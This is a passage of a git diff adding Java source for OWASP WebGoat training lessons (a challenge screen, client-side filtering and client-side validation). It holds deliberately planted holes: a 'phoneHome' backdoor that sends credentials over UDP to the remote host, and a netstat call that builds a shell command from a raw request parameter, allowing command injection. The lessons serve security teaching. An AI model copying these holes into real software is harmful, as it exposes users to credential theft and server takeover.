+		ElementContainer ec = new ElementContainer();
+
+		// get current text and compare to the new text
+		String origpath = s.getContext().getRealPath(
+				WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+		String defaced = getFileText(new BufferedReader(new FileReader(origpath)), false);
+		String origText = getFileText(new BufferedReader(new FileReader(s.getContext().getRealPath(
+				WEBGOAT_CHALLENGE_JSP))), false);
+
+		// show webgoat.jsp text
+		ec.addElement(new H1().addElement("Original Website Text"));
+		ec.addElement(new P().addElement(origText));
+		ec.addElement(new HR());
+		ec.addElement(new H1().addElement("Defaced Website Text"));
+		ec.addElement(new P().addElement(defaced));
+		ec.addElement(new HR());
+
+		return ec;
+	}
+
+	private void resetWebPage(WebSession s)
+	{
+		try
+		{
+			// get current text and compare to the new text
+			String defacedpath = s.getContext().getRealPath(
+					WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+			String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
+
+			// replace the defaced text with the original
+			File usersFile = new File(defacedpath);
+			FileWriter fw = new FileWriter(usersFile);
+			fw.write(getFileText(new BufferedReader(new FileReader(masterFilePath)), false));
+			fw.close();
+			// System.out.println("webgoat_guest replaced: " + getFileText( new
+			// BufferedReader( new FileReader( defacedpath ) ), false ) );
+		}
+		catch (Exception e)
+		{
+			e.printStackTrace();
+		}
+	}
+
+	protected Category getDefaultCategory()
+	{
+		return Category.CHALLENGE;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element doStage4(WebSession s) throws Exception
+	{
+		makeSuccess(s);
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new H1().addElement("Thanks for coming!"));
+		ec.addElement(new BR());
+		ec
+				.addElement(new H1()
+						.addElement("Please remember that you will be caught and fired if you use these techniques for evil."));
+
+		return (ec);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element doStage5(WebSession s) throws Exception
+	{
+		// <START_OMIT_SOURCE>
+		ElementContainer ec = new ElementContainer();
+		return (ec);
+		// <END_OMIT_SOURCE>
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element doStage6(WebSession s) throws Exception
+	{
+		return (new StringElement("not yet"));
+	}
+
+	/**
+	 * Gets the hints attribute of the ChallengeScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		// <START_OMIT_SOURCE>
+
+		List<String> hints = new ArrayList<String>();
+		hints.add("You need to gain access to the Java source code for this lesson.");
+		hints.add("Seriously, no more hints -- it's a CHALLENGE!");
+		hints.add("Come on -- give it a rest!");
+		if (getStage(s) != 1)
+		;
+		{
+			hints.add("Persistance is always rewarded");
+		}
+
+		return hints;
+
+		// <END_OMIT_SOURCE>
+	}
+
+	protected Element makeLogin(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new H1().addElement("Sign In "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%")
+				.setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr
+				.addElement(new TH()
+						.addElement(
+								"Please sign in to your account.  See the OWASP admin if you do not have an account.")
+						.setColSpan(2).setAlign("left"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+		row2.addElement(new TD(new B(new StringElement("*Password: "))));
+
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+		row1.addElement(new TD(input1));
+		row2.addElement(new TD(input2));
+		t.addElement(row1);
+		t.addElement(row2);
+
+		Element b = ECSFactory.makeButton("Login");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+
+		return (ec);
+	}
+
+	/**
+	 * Gets the instructions attribute of the ChallengeScreen object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "Your mission is to break the authentication scheme, "
+				+ "steal all the credit cards from the database, and then deface the website. "
+				+ "You will have to use many of the techniques you have learned in the other lessons. "
+				+ "The main webpage for this site is 'webgoat_challenge_&lt;username&gt;.jsp'";
+
+		return (instructions);
+	}
+
+	/**
+	 * Gets the ranking attribute of the ChallengeScreen object
+	 * 
+	 * @return The ranking value
+	 */
+	protected Integer getDefaultRanking()
+	{
+		return new Integer(130);
+	}
+
+	/**
+	 * This is a deliberate 'backdoor' that would send user name and password
+	 * back to the remote host. Obviously, sending the password back to the
+	 * remote host isn't that useful but... you get the idea
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param message
+	 *            Description of the Parameter
+	 */
+	protected void phoneHome(WebSession s, String message)
+	{
+		try
+		{
+			InetAddress addr = InetAddress.getByName(s.getRequest().getRemoteHost());
+			DatagramPacket dp = new DatagramPacket(message.getBytes(), message.length());
+			DatagramSocket sock = new DatagramSocket();
+			sock.connect(addr, 1234);
+			System.out.println("      Sending message to " + sock.getInetAddress());
+			sock.send(dp);
+			sock.close();
+		}
+		catch (Exception e)
+		{
+			System.out.println("Couldn't phone home");
+			e.printStackTrace();
+		}
+	}
+
+	/**
+	 * Gets the title attribute of the ChallengeScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("The CHALLENGE!");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected ElementContainer getNetstatResults(WebSession s)
+	{
+		// <START_OMIT_SOURCE>
+
+		ElementContainer ec = new ElementContainer();
+
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
+				.setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Protocol").setWidth("7%"));
+		tr.addElement(new TH().addElement("Local Address").setWidth("80%"));
+		tr.addElement(new TH().addElement("Foreign Address").setWidth("10%"));
+		tr.addElement(new TH().addElement("State").setWidth("3%"));
+		t.addElement(tr);
+
+		String protocol = s.getParser().getRawParameter(PROTOCOL, "tcp");
+
+		String osName = System.getProperty("os.name");
+		ExecResults er = null;
+		if (osName.indexOf("Windows") != -1)
+		{
+			String cmd = "cmd.exe /c netstat -a -p " + protocol;
+			er = Exec.execSimple(cmd);
+		} else
+		{
+			String[] cmd = { "/bin/sh", "-c", "netstat -a -p " + protocol };
+			er = Exec.execSimple(cmd);
+		}
+
+		String results = er.getOutput();
+		StringTokenizer lines = new StringTokenizer(results, "\n");
+		String line = lines.nextToken();
+		// System.out.println(line);
+		int start = 0;
+		while (start == 0 && lines.hasMoreTokens())
+		{
+			if ((line.indexOf("Proto") != -1))
+			{
+				start++;
+			} else
+			{
+				line = lines.nextToken();
+			}
+		}
+		while (start > 0 && lines.hasMoreTokens())
+		{
+			// in order to avoid a ill-rendered screen when the user performs
+			// command injection, we will wrap the screen at 4 columns
+			int columnCount = 4;
+			tr = new TR();
+			StringTokenizer tokens = new StringTokenizer(lines.nextToken(), "\t ");
+			while (tokens.hasMoreTokens() && columnCount-- > 0)
+			{
+				tr.addElement(new TD().addElement(tokens.nextToken()));
+			}
+			t.addElement(tr);
+		}
+		// parse the results
+		ec.addElement(t);
+		return (ec);
+		// <END_OMIT_SOURCE>
+
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeClues(WebSession s)
+	{
+		return new StringElement("Clues not Available :)");
+	}
+
+	protected Element makeHints(WebSession s)
+	{
+		return new StringElement("Hint: Find the hints");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param message
+	 *            Description of the Parameter
+	 */
+	protected void sendMessage(Socket s, String message)
+	{
+		try
+		{
+			OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream());
+			osw.write(message);
+		}
+		catch (Exception e)
+		{
+			System.out.println("Couldn't write " + message + " to " + s);
+			e.printStackTrace();
+		}
+	}
+
+	protected Element buildCart(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new HR().setWidth("90%"));
+		ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
+				.setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+		tr.addElement(new TH().addElement("Price:").setWidth("10%"));
+		tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
+		tr.addElement(new TH().addElement("Total").setWidth("7%"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("Sympathy Bouquet"));
+		tr.addElement(new TD().addElement("59.99").setAlign("right"));
+		tr.addElement(new TD().addElement(" 1 ").setAlign("right"));
+		tr.addElement(new TD().addElement("59.99"));
+		t.addElement(tr);
+
+		ec.addElement(t);
+
+		t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign(
+				"center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		ec.addElement(new BR());
+		tr = new TR();
+		tr.addElement(new TD().addElement("The total charged to your credit card:"));
+		tr.addElement(new TD().addElement("59.99"));
+		t.addElement(tr);
+
+		ec.addElement(t);
+
+		return (ec);
+	}
+
+	public boolean canHaveClues()
+	{
+		return false;
+	}
+
+	/**
+	 * Gets the cookie attribute of the CookieScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return The cookie value
+	 */
+	protected String getCookie(WebSession s)
+	{
+		Cookie[] cookies = s.getRequest().getCookies();
+
+		for (int i = 0; i < cookies.length; i++)
+		{
+			if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE))
+			{
+				return (cookies[i].getValue());
+			}
+		}
+
+		return (null);
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
new file mode 100644
index 000000000..6a0f37b3a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
@@ -0,0 +1,429 @@
+package org.owasp.webgoat.lessons.ClientSideFiltering;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileReader;
+import java.io.IOException;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.Script;
+import org.apache.ecs.html.Select;
+import org.apache.ecs.html.Style;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.jsp.jsp_include;
+import org.apache.ecs.xhtml.style;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.SequentialLessonAdapter;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+public class ClientSideFiltering extends SequentialLessonAdapter {
+
+	private final static String ANSWER = "answer";
+
+	public final static A ASPECT_LOGO = new A().setHref(
+			"http://www.aspectsecurity.com").addElement(
+			new IMG("images/logos/aspect.jpg").setAlt("Aspect Security")
+					.setBorder(0).setHspace(0).setVspace(0));
+
+	protected Element createContent(WebSession s) {
+		return super.createStagedContent(s);
+	}
+
+	protected Element createMainContent(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+
+		try {
+
+			ec.addElement(new Script()
+					.setSrc("javascript/clientSideFiltering.js"));
+
+			Input input = new Input(Input.HIDDEN, "userID", 102);
+
+			input.setID("userID");
+
+			ec.addElement(input);
+
+			style sty = new style();
+			sty
+					.addElement("#lesson_wrapper {height: 435px;width: 500px;}"
+							+ "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);"
+							+ "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}"
+							+ ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);"
+							+ "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}");
+
+			ec.addElement(sty);
+
+			Div wrapperDiv = new Div();
+			wrapperDiv.setID("lesson_wrapper");
+
+			Div headerDiv = new Div();
+			headerDiv.setID("lesson_header");
+
+			Div workspaceDiv = new Div();
+			workspaceDiv.setClass("lesson_workspace");
+
+			wrapperDiv.addElement(headerDiv);
+			wrapperDiv.addElement(workspaceDiv);
+
+			ec.addElement(wrapperDiv);
+
+			workspaceDiv.addElement(new BR());
+			workspaceDiv.addElement(new BR());
+
+			workspaceDiv.addElement(new P()
+					.addElement("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Select user:"));
+
+			workspaceDiv.addElement(createDropDown());
+
+			workspaceDiv.addElement(new P());
+
+			Table t = new Table().setCellSpacing(0).setCellPadding(2)
+					.setBorder(1).setWidth("90%").setAlign("center");
+
+			t.setID("hiddenEmployeeRecords");
+			t.setStyle("display: none");
+
+			workspaceDiv.addElement(t);
+
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1)
+					.setWidth("90%").setAlign("center");
+
+			TR tr = new TR();
+			tr.addElement(new TD().addElement("UserID"));
+			tr.addElement(new TD().addElement("First Name"));
+			tr.addElement(new TD().addElement("Last Name"));
+			tr.addElement(new TD().addElement("SSN"));
+			tr.addElement(new TD().addElement("Salary"));
+			t.addElement(tr);
+			tr = new TR();
+			tr.setID("employeeRecord");
+			t.addElement(tr);
+
+			workspaceDiv.addElement(t);
+
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * Gets the category attribute of the RoleBasedAccessControl object
+	 * 
+	 * @return The category value
+	 */
+
+	protected ElementContainer doStage1(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+
+		StringBuffer answerString = null;
+		int answer = 0;
+
+		try {
+			answerString = new StringBuffer(s.getParser().getStringParameter(
+					ANSWER, ""));
+			answer = Integer.parseInt(answerString.toString());
+		} catch (NumberFormatException e) {
+
+			// e.printStackTrace();
+		}
+
+		if (answer == 450000) {
+
+			getLessonTracker(s).setStage(2);
+			s.setMessage("Stage 1 completed.");
+
+			// Redirect user to Stage2 content.
+			ec.addElement(doStage2(s));
+		} else {
+			ec.addElement(stage1Content(s));
+		}
+
+		return ec;
+
+	}
+
+	protected Element doStage2(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+
+		/**
+		 * They pass iff:
+		 * 
+		 * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)"
+		 */
+		String file = s.getWebResource("lessons/Ajax/clientSideFiltering.jsp");
+		String content = getFileContent(file);
+
+		if (content.indexOf("[Managers/Manager/text()") != -1) {
+			makeSuccess(s);
+			ec.addElement(stage2Content(s));
+		} else {
+			ec.addElement(stage2Content(s));
+		}
+
+		return ec;
+	}
+
+	protected ElementContainer stage1Content(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+		try {
+
+			ec.addElement(createMainContent(s));
+
+			Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+			if (s.isColor()) {
+				t1.setBorder(1);
+			}
+
+			TR tr = new TR();
+			tr.addElement(new TD()
+					.addElement("What is Neville Bartholomew's salary? "));
+			tr.addElement(new TD(new Input(Input.TEXT, ANSWER, "")));
+			Element b = ECSFactory.makeButton("Submit Answer");
+			tr.addElement(new TD(b).setAlign("LEFT"));
+			t1.addElement(tr);
+
+			ec.addElement(t1);
+
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return ec;
+	}
+
+	protected ElementContainer stage2Content(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+		try {
+
+			ec.addElement(createMainContent(s));
+
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+
+			Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+			if (s.isColor()) {
+				t1.setBorder(1);
+			}
+
+			TR tr = new TR();
+			/*tr.addElement(new TD()
+			 .addElement("Press 'Submit' when you believe you have completed the lesson."));
+			 */
+			Element b = ECSFactory
+					.makeButton("Click here when you believe you have completed the lesson.");
+			tr.addElement(new TD(b).setAlign("CENTER"));
+			t1.addElement(tr);
+
+			ec.addElement(t1);
+
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return ec;
+	}
+
+	protected Select createDropDown() {
+		Select select = new Select("UserSelect");
+
+		select.setID("UserSelect");
+
+		org.apache.ecs.html.Option option = new org.apache.ecs.html.Option(
+				"Choose Employee", "0", "Choose Employee");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Larry Stooge", "101",
+				"Larry Stooge");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Curly Stooge", "103",
+				"Curly Stooge");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Eric Walker", "104",
+				"Eric Walker");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Tom Cat", "105", "Tom Cat");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Jerry Mouse", "106",
+				"Jerry Mouse");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("David Giambi", "107",
+				"David Giambi");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Bruce McGuirre", "108",
+				"Bruce McGuirre");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Sean Livingston", "109",
+				"Sean Livingston");
+
+		select.addElement(option);
+
+		option = new org.apache.ecs.html.Option("Joanne McDougal", "110",
+				"Joanne McDougal");
+
+		select.addElement(option);
+
+		select.setOnChange("selectUser()");
+
+		select.setOnFocus("fetchUserData()");
+
+		return select;
+
+	}
+
+	protected Category getDefaultCategory() {
+		return Category.AJAX_SECURITY;
+	}
+
+	/**
+	 * Gets the hints attribute of the RoleBasedAccessControl object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s) {
+		List<String> hints = new ArrayList<String>();
+
+		hints
+				.add("The information displayed when an employee is choosen from the drop down menu is stored on the client side.");
+
+		hints
+				.add("Use Firebug to find where the information is stored on the client side.");
+
+		hints
+				.add("Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
+
+		hints.add("Look in the last row of the hidden table.");
+
+		hints
+				.add("You can access the server directly <a href = \"/WebGoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
+						+ "to see what results are being returned");
+
+		hints.add("The server uses an XPath query agasinst an XML database.");
+
+		hints
+				.add("The query currently returns all of the contents of the database.");
+
+		hints
+				.add("The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
+
+		hints.add("Try using a filter operator.");
+
+		hints
+				.add("your filter operator shoiuld look something like: [Managers/Manager/text()=");
+
+		return hints;
+
+	}
+
+	public String getInstructions(WebSession s) {
+		String instructions = "";
+
+		if (getLessonTracker(s).getStage() == 1) {
+			instructions = "STAGE 1:\tYou are Moe Stooge, CSO of Goat Hills Financial.  "
+					+ "You have access to everyone in the company's information, except the CEO, "
+					+ "Neville Bartholomew.  Or at least you shouldn't have access to the CEO's information."
+					+ "  For this exercise, "
+					+ "examine the contents of the page to see what extra information you can find.";
+		} else if (getLessonTracker(s).getStage() == 2) {
+			instructions = "STAGE 2:\tNow, fix the problem.  Modify the server to only return "
+					+ "results that Moe Stooge is allowed to see.";
+		}
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(10);
+
+	protected Integer getDefaultRanking() {
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the resources attribute of the RoleBasedAccessControl object
+	 * 
+	 * @param rl
+	 *            Description of the Parameter
+	 * @return The resources value
+	 */
+
+	/**
+	 * Gets the role attribute of the RoleBasedAccessControl object
+	 * 
+	 * @param user
+	 *            Description of the Parameter
+	 * @return The role value
+	 */
+
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+
+	public String getTitle() {
+		return ("LAB: Client Side Filtering");
+	}
+
+	private String getFileContent(String content) {
+		BufferedReader is = null;
+		StringBuffer sb = new StringBuffer();
+
+		try {
+			is = new BufferedReader(new FileReader(new File(content)));
+			String s = null;
+
+			while ((s = is.readLine()) != null) {
+				sb.append(s);
+			}
+		} catch (Exception e) {
+			e.printStackTrace();
+		} finally {
+			if (is != null) {
+				try {
+					is.close();
+				} catch (IOException ioe) {
+
+				}
+			}
+		}
+
+		return sb.toString();
+	}
+
+	public Element getCredits() {
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java
new file mode 100644
index 000000000..fc48ebdb7
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java
@@ -0,0 +1,423 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.Script;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+public class ClientSideValidation extends SequentialLessonAdapter {
+
+	/**
+	 * Description of the Method
+	 *
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+
+	private boolean stage1FirstVisit = true;
+
+	private boolean stage2FirstVisit = true;
+
+	protected Element createContent(WebSession s) {
+		return super.createStagedContent(s);
+	}
+
+	protected Element doStage1(WebSession s) {
+		return evalStage1(s);
+	}
+
+	protected Element doStage2(WebSession s) {
+		return stage2Content(s);
+	}
+
+	protected Element evalStage1(WebSession s) {
+
+		ElementContainer ec = new ElementContainer();
+
+		String param1 = s.getParser().getRawParameter("field1", "");
+
+		//test success
+
+		if (param1.equalsIgnoreCase("platinum")
+				|| param1.equalsIgnoreCase("gold")
+				|| param1.equalsIgnoreCase("silver")
+				|| param1.equalsIgnoreCase("bronze")
+				|| param1.equalsIgnoreCase("pressone")
+				|| param1.equalsIgnoreCase("presstwo")) {
+			getLessonTracker(s).setStage(2);
+			//s.resetHintCount();
+			s.setMessage("Stage 1 completed.");
+
+			// Redirect user to Stage2 content.
+			ec.addElement(doStage2(s));
+
+		} else {
+			if (!stage1FirstVisit) {
+				s.setMessage("Keep looking for the coupon code.");
+			}
+			stage1FirstVisit = false;
+
+			ec.addElement(stage1Content(s));
+		}
+
+		return ec;
+
+	}
+
+
+	protected Element stage1Content(WebSession s) {
+
+		ElementContainer ec = new ElementContainer();
+
+		try {
+
+
+			ec.addElement(new Script()
+					.setSrc("javascript/clientSideValidation.js"));
+
+
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1()
+					.addElement("Shopping Cart")));
+
+			ec.addElement(createQtyTable(s));
+
+			ec.addElement(createTotalTable(s));
+			ec.addElement(new BR());
+			ec.addElement(new HR().setWidth("90%"));
+
+
+
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
+	}
+
+	protected Element stage2Content(WebSession s) {
+
+		ElementContainer ec = new ElementContainer();
+
+		try {
+
+			ec.addElement(new Script()
+					.setSrc("javascript/clientSideValidation.js"));
+
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1()
+					.addElement("Shopping Cart")));
+
+			ec.addElement(createQtyTable(s));
+
+			ec.addElement(createTotalTable(s));
+			ec.addElement(new BR());
+			ec.addElement(new HR().setWidth("90%"));
+
+			// test success
+
+			float grandTotal = s.getParser()
+					.getFloatParameter("GRANDTOT", 0.0f);
+
+			if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit) {
+				makeSuccess(s);
+			} else {
+
+				if (!stage2FirstVisit) {
+					s.setMessage("Your order isn't free yet.");
+				}
+				stage2FirstVisit = false;
+			}
+
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
+	}
+
+	protected ElementContainer createTotalTable(WebSession s) {
+
+		ElementContainer ec = new ElementContainer();
+
+		String param1 = s.getParser().getRawParameter("field1", "");
+		String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
+				"field2", "4128 3214 0002 1999"));
+
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+				.setWidth("90%").setAlign("center");
+
+		if (s.isColor()) {
+			t.setBorder(1);
+		}
+
+		ec.addElement(new BR());
+
+		TR tr = new TR();
+		tr.addElement(new TD()
+				.addElement("Total before coupon is applied:"));
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "SUBTOT", s.getParser()
+						.getStringParameter("SUBTOT", "0")).setReadOnly(true))
+				.setAlign("right"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD()
+				.addElement("Total to be charged to your credit card:"));
+
+		tr.addElement(new TD()
+				.addElement(
+						new Input(Input.TEXT, "GRANDTOT", s.getParser()
+								.getStringParameter("GRANDTOT", "0"))
+								.setReadOnly(true)).setAlign("right"));
+		t.addElement(tr);
+
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("Enter your credit card number:"));
+		tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
+				param2)));
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("Enter your coupon code:"));
+
+		Input input = new Input(Input.TEXT, "field1", param1);
+		input.setOnKeyUp("isValidCoupon(field1.value)");
+		tr.addElement(new TD().addElement(input));
+		t.addElement(tr);
+
+		Element b = ECSFactory.makeButton("Purchase");
+		tr = new TR();
+		tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
+		t.addElement(tr);
+		ec.addElement(t);
+
+		return ec;
+
+	}
+
+	protected int getTotalQty(WebSession s) {
+
+		int quantity = 0;
+
+		quantity += s.getParser().getFloatParameter("QTY1", 0.0f);
+		quantity += s.getParser().getFloatParameter("QTY2", 0.0f);
+		quantity += s.getParser().getFloatParameter("QTY3", 0.0f);
+		quantity += s.getParser().getFloatParameter("QTY4", 0.0f);
+
+		return quantity;
+	}
+
+	protected ElementContainer createQtyTable(WebSession s) {
+
+		ElementContainer ec = new ElementContainer();
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1)
+				.setWidth("90%").setAlign("center");
+
+		if (s.isColor()) {
+			t.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now")
+				.setWidth("70%"));
+		tr.addElement(new TH().addElement("Price").setWidth("10%"));
+		tr.addElement(new TH().addElement("Quantity").setWidth("10%"));
+		tr.addElement(new TH().addElement("Total").setWidth("10%"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr
+				.addElement(new TD()
+						.addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter(
+						"PRC1", "69.99")).setSize(10).setReadOnly(true)).setAlign("right"));
+
+		Input input = new Input(Input.TEXT, "QTY1", s.getParser()
+				.getStringParameter("QTY1", "0"));
+
+		input.setOnKeyUp("updateTotals();");
+		input.setOnLoad("updateTotals();");
+		input.setSize(10);
+
+		tr.addElement(new TD().addElement(input).setAlign("right"));
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter(
+						"TOT1", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter(
+						"PRC2", "27.99")).setSize(10).setReadOnly(true)).setAlign("right"));
+
